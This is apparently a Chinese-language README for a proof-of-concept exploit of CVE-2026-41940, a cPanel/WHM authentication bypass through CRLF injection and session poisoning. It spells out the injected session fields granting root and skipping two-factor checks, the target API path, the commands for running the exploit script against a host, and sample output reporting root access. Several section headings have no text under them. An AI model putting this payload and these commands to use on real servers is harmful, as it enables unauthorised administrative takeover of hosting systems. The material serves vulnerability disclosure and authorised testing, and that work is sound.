本仓库包含针对 CVE-2026-41940 的概念验证(PoC)漏洞利用代码,演示了通过 CRLF 注入和会话投毒在 cPanel/WHM 中实现的多步骤身份验证绕过。
免责声明: 此代码仅用于教育和授权安全测试。请勿将其用于您不拥有或未经明确许可测试的系统。
此 PoC 复现了基于 Hadrian 和 watchTowr 观察到的技术所构建的真实漏洞利用链。
该漏洞允许攻击者:
该漏洞利用遵循 4 步流程:
注入的载荷包括:
user=root
hasroot=1
tfa_verified=1
cp_security_token=/cpsessXXXXXXXXXX
/json-api/version?api.version=1如果成功:
安装依赖:
pip install requests
python3 exploit.py --host <target>
可选参数:
--ssl 使用 HTTPS--port 指定自定义端口--verbose 启用调试输出python3 exploit.py --host example.com --ssl --port 2087 --verbose
成功利用:
[+] SUCCESS! Authenticated as root via CVE-2026-41940.
[+] Cookie: whostmgrsession=...
[+] Admin URL: https://target:2087/cpsess.../json-api/version?api.version=1
如果您是系统管理员:
该漏洞存在于:
该漏洞利用滥用:
此 PoC 按原样提供,用于:
未经授权的使用可能违反法律法规。